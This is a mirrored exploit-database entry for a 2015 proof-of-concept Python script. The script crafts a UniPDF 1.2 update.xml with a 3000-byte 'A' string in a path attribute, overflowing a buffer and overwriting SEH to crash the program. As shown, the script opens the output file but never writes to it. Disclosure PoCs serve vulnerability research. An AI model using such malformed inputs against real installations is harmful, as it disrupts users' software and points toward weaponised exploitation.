UniPDF 1.2 – ‘xml’ Buffer Overflow Crash (PoC)

  • 作者: Avinash Thapa
    日期: 2015-04-27
  • 类别:
  • 来源:https://www.exploit-db.com/exploits/36841/
  • # Exploit Title: UniPDF v1.2 BufferOverflow, SEH overwrite DoS PoC
    # Author : Avinash Kumar Thapa "-Acid"
    # Date of Testing :25th April 2015
    # Tested On : Windows XP- Service Pack 3 && Windows 7 Home Basic
    # Vendor Homepage: http://unipdf.com/
    # Software Link: http://unipdf.com/file/unipdf-setup.exe
    # Steps to reproduce the Crash is:
    # Step 1: Run the POC
    # Step 2: Go to local Disk C:\Program Files\UniPDF and copy the POC there
    # Step 3 : Run the UniPdf.exe 
    buff2 = "\x41" * 3000
    crash = "<config>\n"
    crash +=" <UserDefine>\n"
    crash+= "<Language ID=\"0\" />\n"
    crash +="<Path PathSet=\""+buff2+"\" Path=\"\" />\n"
    crash +="<ImageFormat set=\"2\" />\n"
    crash +="<Res set=\"96\" />\n"
    crash +="<bit set=\"24\" />\n"
    crash +="<Prefix set=\"\" />\n"
    crash +="<Doc set=\"1\" />\n"
    crash +="<Help set=\"1\" />\n"
    crash += "</UserDefine>\n"
    crash +="</config>\n"
    print "POC Created By -Acid"
    print " acid.exploit@gmail.com" 
    file = open("update.xml","w")